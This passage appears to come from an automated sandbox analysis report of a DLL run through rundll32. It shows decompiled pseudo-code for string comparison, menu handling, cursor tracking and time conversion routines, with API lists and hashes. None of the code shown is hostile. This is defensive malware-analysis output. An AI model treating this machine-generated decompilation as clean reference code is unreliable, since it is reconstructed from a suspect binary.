					 *(_t167 - 0x3c) = _t162;
					 *(_t167 - 0x44) = _t162;
					 *(_t167 - 0x40) = _t162;
					if( *(_t167 + 0x20) == _t162) {
						_t144 =  *0x1004f734; // 0x0
						 *(_t167 + 0x20) = _t144;
					}
					if( *(_t167 + 0x14) == _t162 || _t95 == _t162) {
						if( *(_t167 + 0x14) != _t95) {
							__eflags = _t95 - _t165;
							if(_t95 > _t165) {
								L69:
								_t98 = _t165;
								goto L70;
							}
							__eflags =  *(_t167 + 0x14) - _t165;
							if( *(_t167 + 0x14) <= _t165) {
								_t111 = GetCPInfo( *(_t167 + 0x20), _t167 - 0x30);
								__eflags = _t111;
								if(_t111 == 0) {
									goto L61;
								}
								__eflags =  *(_t167 + 0x14) - _t162;
								if( *(_t167 + 0x14) <= _t162) {
									__eflags =  *(_t167 + 0x1c) - _t162;
									if( *(_t167 + 0x1c) <= _t162) {
										goto L38;
									}
									__eflags =  *(_t167 - 0x30) - _t141;
									if( *(_t167 - 0x30) < _t141) {
										goto L69;
									}
									_t132 = _t167 - 0x2a;
									__eflags =  *((char*)(_t167 - 0x2a));
									if( *((char*)(_t167 - 0x2a)) == 0) {
										goto L69;
									} else {
										goto L33;
									}
									while(1) {
										L33:
										_t159 =  *((intOrPtr*)(_t132 + 1));
										__eflags = _t159;
										if(_t159 == 0) {
											goto L69;
										}
										_t154 =  *( *(_t167 + 0x18));
										__eflags = _t154 -  *_t132;
										if(_t154 <  *_t132) {
											L36:
											_t132 = _t132 + _t141;
											__eflags =  *_t132;
											if( *_t132 != 0) {
												continue;
											}
											goto L69;
										}
										__eflags = _t154 - _t159;
										if(_t154 <= _t159) {
											goto L17;
										}
										goto L36;
									}
									goto L69;
								}
								__eflags =  *(_t167 - 0x30) - _t141;
								if( *(_t167 - 0x30) < _t141) {
									goto L20;
								}
								_t133 = _t167 - 0x2a;
								__eflags =  *((char*)(_t167 - 0x2a));
								if( *((char*)(_t167 - 0x2a)) == 0) {
									goto L20;
								} else {
									goto L25;
								}
								while(1) {
									L25:
									_t160 =  *((intOrPtr*)(_t133 + 1));
									__eflags = _t160;
									if(_t160 == 0) {
										goto L20;
									}
									_t156 =  *( *(_t167 + 0x10));
									__eflags = _t156 -  *_t133;
									if(_t156 <  *_t133) {
										L28:
										_t133 = _t133 + _t141;
										__eflags =  *_t133;
										if( *_t133 != 0) {
											continue;
										}
										goto L20;
									}
									__eflags = _t156 - _t160;
									if(_t156 <= _t160) {
										goto L17;
									}
									goto L28;
								}
							}
							L20:
							_t98 = 3;
							goto L70;
						}
						L17:
						_t98 = _t141;
						goto L70;
					} else {
						L38:
						_t143 = MultiByteToWideChar( *(_t167 + 0x20), 9,  *(_t167 + 0x10),  *(_t167 + 0x14), _t162, _t162);
						 *(_t167 - 0x48) = _t143;
						__eflags = _t143 - _t162;
						if(_t143 == _t162) {
							goto L61;
						}
						 *(_t167 - 4) = _t162;
						E10010B20(_t143 + _t143 + 0x00000003 & 0xfffffffc, _t144);
						 *(_t167 - 0x18) = _t168;
						 *(_t167 - 0x34) = _t168;
						 *(_t167 - 4) =  *(_t167 - 4) | 0xffffffff;
						_t118 =  *(_t167 - 0x34);
						__eflags = _t118 - _t162;
						if(_t118 != _t162) {
							L43:
							_t119 = MultiByteToWideChar( *(_t167 + 0x20), _t165,  *(_t167 + 0x10),  *(_t167 + 0x14), _t118, _t143);
							__eflags = _t119;
							if(_t119 == 0) {
								L53:
								__eflags =  *(_t167 - 0x3c);
								if(__eflags != 0) {
									_push( *(_t167 - 0x34));
									E100107C8(_t143, _t162, _t165, __eflags);
								}
								_t98 =  *(_t167 - 0x40);
								goto L70;
							}
							_t165 = MultiByteToWideChar( *(_t167 + 0x20), 9,  *(_t167 + 0x18),  *(_t167 + 0x1c), 0, 0);
							 *(_t167 - 0x4c) = _t165;
							__eflags = _t165;
							if(_t165 == 0) {
								goto L53;
							}
							 *(_t167 - 4) = 1;
							E10010B20(_t165 + _t165 + 0x00000003 & 0xfffffffc, _t144);
							 *(_t167 - 0x18) = _t168;
							_t162 = _t168;
							 *(_t167 - 0x50) = _t162;
							 *(_t167 - 4) =  *(_t167 - 4) | 0xffffffff;
							__eflags = _t162;
							if(_t162 != 0) {
								L49:
								_t126 = MultiByteToWideChar( *(_t167 + 0x20), 1,  *(_t167 + 0x18),  *(_t167 + 0x1c), _t162, _t165);
								__eflags = _t126;
								if(_t126 != 0) {
									 *(_t167 - 0x40) = CompareStringW( *(_t167 + 8),  *(_t167 + 0xc),  *(_t167 - 0x34), _t143, _t162, _t165);
								}
								__eflags =  *(_t167 - 0x44);
								if(__eflags != 0) {
									_push(_t162);
									E100107C8(_t143, _t162, _t165, __eflags);
								}
								goto L53;
							} else {
								_t162 = E100107B6(_t165 + _t165);
								__eflags = _t162;
								if(_t162 == 0) {
									goto L53;
								}
								 *(_t167 - 0x44) = 1;
								goto L49;
							}
						} else {
							_t118 = E100107B6(_t143 + _t143);
							_pop(_t144);
							 *(_t167 - 0x34) = _t118;
							__eflags = _t118 - _t162;
							if(_t118 == _t162) {
								goto L61;
							}
							 *(_t167 - 0x3c) = _t165;
							goto L43;
						}
					}
				}
			}

APIs

CompareStringW.KERNEL32(00000000,00000000,10042704,00000001,10042704,00000001,10042FA0,00000040,1001BF03,?,00000001,?,00000000,?,00000000,?), ref: 1001C451
GetLastError.KERNEL32(?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC,10042CD0,00000018,10019429,10042CE0,00000008,10013474), ref: 1001C463
GetCPInfo.KERNEL32(00000000,00000000,10042FA0,00000040,1001BF03,?,00000001,?,00000000,?,00000000,?,?,1001AE49,00000000,00000000), ref: 1001C50D
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000004,00000000,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C59B
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000004,00000190,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C614
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,100101C3,00000000,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C631
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,100101C3,?,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C6A7

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ByteCharMultiWide$CompareErrorInfoLastString
String ID:
API String ID: 1773772771-0
Opcode ID: c77f23d90567df6e736b9aafa9777b77d817b83e23b873e610d66b8219189818
Instruction ID: f9a15a39c5567b5c4af314f3663c8d3c96b15f003a3eabc65cf21064ebdc607f
Opcode Fuzzy Hash: c77f23d90567df6e736b9aafa9777b77d817b83e23b873e610d66b8219189818
Instruction Fuzzy Hash: DCB1897690825EAFDF22CFA4DC95EAE7BF6EF05690F200119F840AA1A1D771D9D0CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1003210C Relevance: 13.6, APIs: 9, Instructions: 137
windowCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E1003210C(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, int _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				int _v16;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				int _v44;
				char _v48;
				void* __ebp;
				int _t59;
				int _t60;
				void* _t61;
				int _t63;
				signed int _t67;
				int _t68;
				void* _t69;
				int _t71;
				intOrPtr _t74;
				int _t75;
				int _t76;
				struct HMENU__* _t88;
				intOrPtr _t90;

				_t74 = __ecx;
				_v8 = __ecx;
				E10029BA4( *((intOrPtr*)(__ecx + 0x1c)));
				if(_a12 == 0) {
					_t90 = _a4;
					if( *((intOrPtr*)(__ecx + 0x7c)) == 0) {
						L3:
						E1001FFB4( &_v48);
						_v36 = _t90;
						if( *((intOrPtr*)(E100373A5() + 0x78)) !=  *(_t90 + 4)) {
							if(GetMenu( *(_t74 + 0x1c)) == 0) {
								L14:
								_t59 = GetMenuItemCount( *(_t90 + 4));
								_v40 = _v40 & 0x00000000;
								_v16 = _t59;
								if(_t59 <= 0) {
									L34:
									L35:
									return _t59;
								}
								do {
									_t60 = GetMenuItemID( *(_t90 + 4), _v40);
									_v44 = _t60;
									if(_t60 == 0) {
										goto L33;
									}
									if(_t60 != 0xffffffff) {
										_v32 = _v32 & 0x00000000;
										if( *((intOrPtr*)(_t74 + 0x50)) == 0 || _t60 >= 0xf000) {
											_t61 = 0;
										} else {
											_t61 = 1;
										}
										_push(_t61);
										L27:
										_push(_t74);
										E1001FFDA( &_v48);
										_t63 = GetMenuItemCount( *(_t90 + 4));
										_t75 = _t63;
										if(_t75 >= _v16) {
											L32:
											_v16 = _t75;
											_t74 = _v8;
											goto L33;
										}
										_v40 = _v40 + _t63 - _v16;
										while(_v40 < _t75) {
											if(GetMenuItemID( *(_t90 + 4), _v40) != _v44) {
												goto L32;
											}
											_v40 = _v40 + 1;
										}
										goto L32;
									}
									_t67 = E1000822C(_t90, _v40);
									_v32 = _t67;
									if(_t67 == 0) {
										goto L33;
									}
									_t68 = GetMenuItemID( *(_t67 + 4), 0);
									_v44 = _t68;
									if(_t68 != 0 && _t68 != 0xffffffff) {
										_push(0);
										goto L27;
									}
									L33:
									_v40 = _v40 + 1;
									_t59 = _v40;
								} while (_t59 < _v16);
								goto L34;
							}
							_t69 = E10023092(_t74);
							if(_t69 == 0) {
								goto L14;
							}
							_t88 = GetMenu( *(_t69 + 0x1c));
							if(_t88 == 0) {
								goto L14;
							}
							_t71 = GetMenuItemCount(_t88);
							_t76 = 0;
							_a12 = _t71;
							if(_t71 <= 0) {
								L13:
								_t74 = _v8;
								goto L14;
							}
							while(GetSubMenu(_t88, _t76) !=  *(_t90 + 4)) {
								_t76 = _t76 + 1;
								if(_t76 < _a12) {
									continue;
								}
								goto L13;
							}
							_push(_t88);
							_v12 = E10026280();
							goto L13;
						}
						_v12 = _t90;
						goto L14;
					}
					_push(0);
					_push(_a8);
					_push(_t90);
					_t59 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x7c)))) + 0x74))();
					if(0 != 0) {
						goto L35;
					}
					goto L3;
				}
				return 0;
			}

APIs

Part of subcall function 10029BA4: GetFocus.USER32 ref: 10029BA5
Part of subcall function 10029BA4: GetParent.USER32(00000000), ref: 10029BCE
Part of subcall function 10029BA4: GetWindowLongA.USER32 ref: 10029BE9
Part of subcall function 10029BA4: GetParent.USER32(10032120), ref: 10029BF7
Part of subcall function 10029BA4: GetDesktopWindow.USER32 ref: 10029BFB
Part of subcall function 10029BA4: SendMessageA.USER32 ref: 10029C0F

GetMenu.USER32(?), ref: 10032170
GetMenu.USER32(?), ref: 10032184
GetMenuItemCount.USER32 ref: 1003218D
GetSubMenu.USER32 ref: 1003219E
GetMenuItemCount.USER32 ref: 100321C0
GetMenuItemID.USER32(?,00000000), ref: 100321E1
GetMenuItemID.USER32(?,00000000), ref: 10032209
GetMenuItemCount.USER32 ref: 10032240
GetMenuItemID.USER32(?,00000000), ref: 1003225B

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
String ID:
API String ID: 4186786570-0
Opcode ID: 9b251247e75d24311a4f30fcd34c0b76c3a2b708c8d64061887fd89411845d20
Instruction ID: b99619ff26336beedcb7e2a7f55a8e8b58b7034f18844737f90654ad770cd7ca
Opcode Fuzzy Hash: 9b251247e75d24311a4f30fcd34c0b76c3a2b708c8d64061887fd89411845d20
Instruction Fuzzy Hash: 19415931900209AFDF42DFA4CE84AAEB7F5FF08792F214569E911EA152D731EE41DB60

Uniqueness

Uniqueness Score: -1.00%

Function 1002F502 Relevance: 13.6, APIs: 9, Instructions: 127
timekeyboardCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E1002F502(intOrPtr* __ecx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagPOINT _v20;
				void* __ebp;
				short _t42;
				signed int _t49;
				struct HWND__* _t60;
				intOrPtr _t63;
				intOrPtr _t66;
				void* _t68;
				void* _t71;
				void* _t74;
				intOrPtr _t83;
				void* _t84;
				intOrPtr _t85;
				struct HWND__* _t87;
				intOrPtr _t88;
				intOrPtr* _t89;
				void* _t90;

				_t89 = __ecx;
				_t42 = GetKeyState(1);
				if(_t42 < 0) {
					return _t42;
				}
				_t85 = E100373DB();
				_v12 = _t85;
				GetCursorPos( &_v20);
				ScreenToClient( *(_t89 + 0x1c),  &_v20);
				_t49 =  *((intOrPtr*)( *_t89 + 0x6c))(_v20.x, _v20.y, 0, _t84, _t71);
				_v8 = _t49;
				if(_t49 < 0) {
					 *(_t85 + 0x78) =  *(_t85 + 0x78) | 0xffffffff;
				} else {
					_t74 = E10023092(_t89);
					if(E100230BA() == 0 || E100203CE(_t74) == 0) {
						_v8 = _v8 | 0xffffffff;
					}
					_t66 =  *((intOrPtr*)(_t85 + 0x3c));
					if(_t66 != 0) {
						_t88 =  *((intOrPtr*)(_t66 + 0x1c));
					} else {
						_t88 = 0;
					}
					_t68 = E100220EE(_t90, GetCapture());
					if(_t68 != _t89) {
						if(_t68 != 0) {
							_t83 =  *((intOrPtr*)(_t68 + 0x1c));
						} else {
							_t83 = 0;
						}
						if(_t83 != _t88 && E10023092(_t68) == _t74) {
							_v8 = _v8 | 0xffffffff;
						}
					}
				}
				if(_v8 < 0) {
					L25:
					if( *(_v12 + 0x78) == 0xffffffff) {
						KillTimer( *(_t89 + 0x1c), 0xe001);
					}
					 *((intOrPtr*)( *_t89 + 0x160))(0xffffffff);
					goto L28;
				} else {
					ClientToScreen( *(_t89 + 0x1c),  &_v20);
					_push(_v20.y);
					_t87 = WindowFromPoint(_v20);
					if(_t87 == 0) {
						L23:
						_t59 = _v12;
						_v8 = _v8 | 0xffffffff;
						 *(_t59 + 0x78) =  *(_v12 + 0x78) | 0xffffffff;
						L24:
						if(_v8 >= 0) {
							L28:
							_t53 = 0xe000;
							if(_a4 == 0xe000) {
								_t53 = KillTimer( *(_t89 + 0x1c), 0xe000);
								if(_v8 >= 0) {
									_t53 =  *((intOrPtr*)( *_t89 + 0x160))(_v8);
								}
							}
							return _t53;
						}
						goto L25;
					}
					_t60 =  *(_t89 + 0x1c);
					if(_t87 == _t60 || IsChild(_t60, _t87) != 0) {
						goto L24;
					} else {
						_t63 =  *((intOrPtr*)(_v12 + 0x3c));
						if(_t63 != 0) {
							_t63 =  *((intOrPtr*)(_t63 + 0x1c));
						}
						if(_t63 == _t87) {
							goto L24;
						} else {
							goto L23;
						}
					}
				}
			}

APIs

GetKeyState.USER32 ref: 1002F50D
GetCursorPos.USER32(?), ref: 1002F52C
ScreenToClient.USER32 ref: 1002F539
GetCapture.USER32 ref: 1002F586

Part of subcall function 100203CE: IsWindowEnabled.USER32(?), ref: 100203D7

ClientToScreen.USER32(?,?), ref: 1002F5CD
WindowFromPoint.USER32(?,?), ref: 1002F5D9
IsChild.USER32(?,00000000), ref: 1002F5EE
KillTimer.USER32(?,0000E001), ref: 1002F62B
KillTimer.USER32(?,0000E000), ref: 1002F647

Part of subcall function 100230BA: GetLastActivePopup.USER32(?), ref: 100230C3
Part of subcall function 100230BA: GetForegroundWindow.USER32(00000000,?,1002F565), ref: 100230D1

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$ClientKillScreenTimer$ActiveCaptureChildCursorEnabledForegroundFromLastPointPopupState
String ID:
API String ID: 1383385731-0
Opcode ID: cdf1f45528dd1ab4359947715924eeaa346914062a2f9e1f4d0b7eb2bc272758
Instruction ID: 10a8f74c3fcc8b415ddf3c509ebc5c8d81e0882429dab4cfcda73db0c152bb91
Opcode Fuzzy Hash: cdf1f45528dd1ab4359947715924eeaa346914062a2f9e1f4d0b7eb2bc272758
Instruction Fuzzy Hash: 1741AE31600619DFDB11DF65EC88A6E7BF6FF443A4FA18669E511D72A2DB30DE418B00

Uniqueness

Uniqueness Score: -1.00%

Function 1001328A Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 227
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E1001328A(void* __eax, signed int __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __esi;
				void* __ebp;
				char _t72;
				signed int _t74;
				void* _t86;
				void* _t88;
				void* _t90;
				void* _t92;
				void* _t95;
				void* _t98;
				void* _t101;
				void* _t105;
				intOrPtr _t109;
				intOrPtr _t111;
				void* _t123;
				signed int _t124;
				signed int _t125;
				void* _t127;
				signed int _t133;
				signed int _t138;
				signed int _t139;
				void* _t141;
				signed int _t145;
				signed int _t150;
				signed int _t154;
				signed int _t156;
				signed int _t161;
				signed int _t163;
				void* _t171;

				_t138 = __edx;
				_t141 = __eax;
				_t72 =  *((intOrPtr*)(__eax + 0x14));
				asm("cdq");
				_t154 = __edx;
				_v16 = _t72;
				_v12 = __edx;
				if(_t154 < 0 || _t154 <= 0 && _t72 < 0x45) {
					L30:
					_t139 = _t138 | 0xffffffff;
					__eflags = _t139;
					return _t139;
				} else {
					_t156 = _v12;
					if(_t156 > 0 || _t156 >= 0 && _v16 > 0x44c) {
						goto L30;
					} else {
						_t74 =  *(_t141 + 0x10);
						if(_t74 < 0 || _t74 > 0xb) {
							asm("cdq");
							_t124 = 0xc;
							_t138 = _t74 % _t124;
							_t125 = _t138;
							asm("cdq");
							_v16 = _v16 + _t74 / _t124;
							 *(_t141 + 0x10) = _t125;
							asm("adc [ebp-0x8], edx");
							if(_t125 < 0) {
								_v16 = _v16 + 0xffffffff;
								 *(_t141 + 0x10) = _t125 + 0xc;
								asm("adc dword [ebp-0x8], 0xffffffff");
							}
							_t161 = _v12;
							if(_t161 < 0 || _t161 <= 0 && _v16 < 0x45) {
								goto L30;
							} else {
								_t163 = _v12;
								if(_t163 > 0 || _t163 >= 0 && _v16 > 0x44c) {
									goto L30;
								} else {
									goto L16;
								}
							}
						} else {
							L16:
							_t145 =  *(_t141 + 0x10);
							asm("cdq");
							_v24 =  *((intOrPtr*)(0x1004cecc + _t145 * 4));
							_v20 = _t138;
							if((E10019490(_v16, _v12, 4, 0) | _t138) != 0 || (E10019490(_v16, _v12, 0x64, 0) | _t138) == 0) {
								asm("adc ecx, 0x0");
								if((E10019490(_v16 + 0x76c, _v12, 0x190, 0) | _t138) != 0) {
									goto L21;
								}
								goto L19;
							} else {
								L19:
								if(_t145 > 1) {
									_v24 = _v24 + 1;
									asm("adc dword [ebp-0x10], 0x0");
								}
								L21:
								_t138 = _v12;
								_t127 = 0;
								_t147 = _v16 - 1;
								asm("sbb eax, ecx");
								_v28 = _v12;
								asm("adc edx, ecx");
								_v32 = _v16 - 1;
								_t86 = E10013780(_v16 + 0x12b, _t138, 0x190, _t127);
								asm("cdq");
								asm("adc ecx, edx");
								_v8 = _t138;
								_t88 = E10013780(_v16 - 1, _v28, 0x64, 0);
								asm("sbb eax, edx");
								_t90 = E10013780(_t147, _v28, 4, 0);
								asm("adc eax, edx");
								_t92 = E100122A0(_v16, _v12, 0x16d, 0);
								asm("adc eax, edx");
								asm("adc eax, [ebp-0x10]");
								_v8 = _t86 +  *((intOrPtr*)(_t141 + 0xc)) - _t88 + _t90 + _t92 + _v24 - 0x63df;
								_t123 = 0;
								asm("sbb eax, ebx");
								_t95 = E100122A0(_v8, _v8, 0x18, _t123);
								asm("cdq");
								asm("adc edx, esi");
								_t98 = E100122A0( *((intOrPtr*)(_t141 + 8)) + _t95, _t138, 0x3c, _t123);
								asm("cdq");
								asm("adc edx, esi");
								_t101 = E100122A0( *((intOrPtr*)(_t141 + 4)) + _t98, _t138, 0x3c, _t123);
								_t131 = _t101;
								_t150 = _t138;
								asm("cdq");
								asm("adc edx, esi");
								_t169 = _a4 - _t123;
								_v16 =  *_t141 + _t101;
								_v12 = _t138;
								if(_a4 == _t123) {
									_t105 = E10018BEF( &_v16);
									L28:
									if(_t105 == _t123) {
										goto L30;
									}
									L29:
									_t133 = 9;
									return memcpy(_t141, _t105, _t133 << 2);
								}
								E100193FB(_t150, _t169);
								_t109 =  *0x1004cde8; // 0x7080
								asm("cdq");
								_v16 = _v16 + _t109;
								asm("adc [ebp-0x8], edx");
								_t105 = E100134E7(_t131, _t138,  &_v16);
								if(_t105 == _t123) {
									goto L30;
								}
								_t136 =  *((intOrPtr*)(_t141 + 0x20));
								_t171 =  *((intOrPtr*)(_t141 + 0x20)) - _t123;
								if(_t171 > 0 || _t171 < 0 &&  *((intOrPtr*)(_t105 + 0x20)) > _t123) {
									_t111 =  *0x1004cdf0; // 0xfffff1f0
									asm("cdq");
									_v16 = _v16 + _t111;
									asm("adc [ebp-0x8], edx");
									_t105 = E100134E7(_t136, _t138,  &_v16);
									goto L28;
								} else {
									goto L29;
								}
							}
						}
					}
				}
			}

APIs

__allrem.LIBCMT ref: 10013342
__allrem.LIBCMT ref: 1001335A
__allrem.LIBCMT ref: 10013376
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100133B1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100133CD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100133E4

Part of subcall function 100193FB: __lock.LIBCMT ref: 10019413

Strings

E, xrefs: 10013308

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@$__lock
String ID: E
API String ID: 4106114094-3568589458
Opcode ID: 06da0e30a64430f250144378af185fd51bc4e0d870f8f0e71d8fa3d16068f5cb
Instruction ID: 8c17dd76723e682d1ec04a20f3335422bd29dcdf082c608cde21ea215b529c0d
Opcode Fuzzy Hash: 06da0e30a64430f250144378af185fd51bc4e0d870f8f0e71d8fa3d16068f5cb
Instruction Fuzzy Hash: 90716CB5E00219BFEB55DEE8CC81B9EB7B5EB44324F14C1A9E514EB281D774EA808B50

Uniqueness

Uniqueness Score: -1.00%

Function 1001A487 Relevance: 12.2, APIs: 8, Instructions: 169
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E1001A487(void* __ebx, void* __edi, int __esi, void* __eflags) {
				intOrPtr _t54;
				int _t56;
				char* _t57;
				int _t68;
				char* _t69;
				int _t70;
				int _t73;
				void* _t77;
				int _t81;
				short* _t82;
				void* _t97;
				short* _t98;

				_t94 = __esi;
				_push(0x38);
				_push(0x10042f10);
				E10012514(__ebx, __edi, __esi);
				_t54 =  *0x1004c470; // 0x12db9c4b
				 *((intOrPtr*)(_t97 - 0x1c)) = _t54;
				 *(_t97 - 0x34) = 0;
				 *(_t97 - 0x44) = 0;
				_t81 =  *( *(_t97 + 0x14));
				 *(_t97 - 0x40) = _t81;
				 *(_t97 - 0x3c) = 0;
				_t56 =  *(_t97 + 8);
				if(_t56 ==  *(_t97 + 0xc)) {
					_t82 =  *(_t97 - 0x48);
					goto L31;
				} else {
					_t85 = _t97 - 0x30;
					if(GetCPInfo(_t56, _t97 - 0x30) != 0 &&  *(_t97 - 0x30) == 1 && GetCPInfo( *(_t97 + 0xc), _t97 - 0x30) != 0 &&  *(_t97 - 0x30) == 1) {
						 *(_t97 - 0x3c) = 1;
					}
					if( *(_t97 - 0x3c) == 0) {
						_t94 =  *(_t97 - 0x38);
					} else {
						if(_t81 == 0xffffffff) {
							_t77 = E10011820( *(_t97 + 0x10));
							_pop(_t85);
							_t94 = _t77 + 1;
							__eflags = _t94;
						} else {
							_t94 = _t81;
						}
						 *(_t97 - 0x38) = _t94;
					}
					if( *(_t97 - 0x3c) != 0) {
						L14:
						 *(_t97 - 4) = 0;
						E10010B20(_t94 + _t94 + 0x00000003 & 0xfffffffc, _t85);
						 *(_t97 - 0x18) = _t98;
						_t82 = _t98;
						 *(_t97 - 0x48) = _t82;
						E10011C50(_t82, 0, _t94 + _t94);
						 *(_t97 - 4) =  *(_t97 - 4) | 0xffffffff;
						_t111 = _t82;
						if(_t82 != 0) {
							L19:
							_t68 = MultiByteToWideChar( *(_t97 + 8), 1,  *(_t97 + 0x10),  *(_t97 - 0x40), _t82, _t94);
							__eflags = _t68;
							if(_t68 == 0) {
								L31:
								__eflags =  *(_t97 - 0x44);
								if(__eflags != 0) {
									_push(_t82);
									E100107C8(_t82, 0, _t94, __eflags);
								}
								_t57 =  *(_t97 - 0x34);
								goto L34;
							}
							__eflags =  *(_t97 + 0x18);
							if( *(_t97 + 0x18) == 0) {
								__eflags =  *(_t97 - 0x3c);
								if(__eflags != 0) {
									L25:
									_push(_t94);
									_push(1);
									_t69 = E1001382A(_t82, 0, _t94, __eflags);
									 *(_t97 - 0x34) = _t69;
									__eflags = _t69;
									if(_t69 != 0) {
										_t70 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94, _t69, _t94, 0, 0);
										__eflags = _t70;
										if(__eflags != 0) {
											__eflags =  *(_t97 - 0x40) - 0xffffffff;
											if( *(_t97 - 0x40) != 0xffffffff) {
												 *( *(_t97 + 0x14)) = _t70;
											}
										} else {
											_push( *(_t97 - 0x34));
											E100107C8(_t82, 0, _t94, __eflags);
											 *(_t97 - 0x34) = 0;
										}
									}
									goto L31;
								}
								_t94 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94, 0, 0, 0, 0);
								__eflags = _t94;
								if(__eflags == 0) {
									goto L31;
								}
								goto L25;
							}
							_t73 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94,  *(_t97 + 0x18),  *(_t97 + 0x1c), 0, 0);
							__eflags = _t73;
							if(_t73 != 0) {
								 *(_t97 - 0x34) =  *(_t97 + 0x18);
							}
							goto L31;
						} else {
							_push(_t94);
							_push(2);
							_t82 = E1001382A(_t82, 0, _t94, _t111);
							if(_t82 != 0) {
								 *(_t97 - 0x44) = 1;
								goto L19;
							}
							goto L17;
						}
					} else {
						_t94 = MultiByteToWideChar( *(_t97 + 8), 1,  *(_t97 + 0x10), _t81, 0, 0);
						 *(_t97 - 0x38) = _t94;
						if(_t94 == 0) {
							L17:
							_t57 = 0;
							L34:
							return E1001254F(E100117AE(_t57,  *((intOrPtr*)(_t97 - 0x1c))));
						}
						goto L14;
					}
				}
			}

APIs

GetCPInfo.KERNEL32(00000000,?,10042F10,00000038,100185C0,?,00000000,00000000,10012C1E,00000000,00000000,10042730,0000001C,1001294D,00000001,00000020), ref: 1001A4C5
GetCPInfo.KERNEL32(00000000,00000001), ref: 1001A4D8
_strlen.LIBCMT ref: 1001A4FC
MultiByteToWideChar.KERNEL32(00000000,00000001,10012C1E,?,00000000,00000000), ref: 1001A51D

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
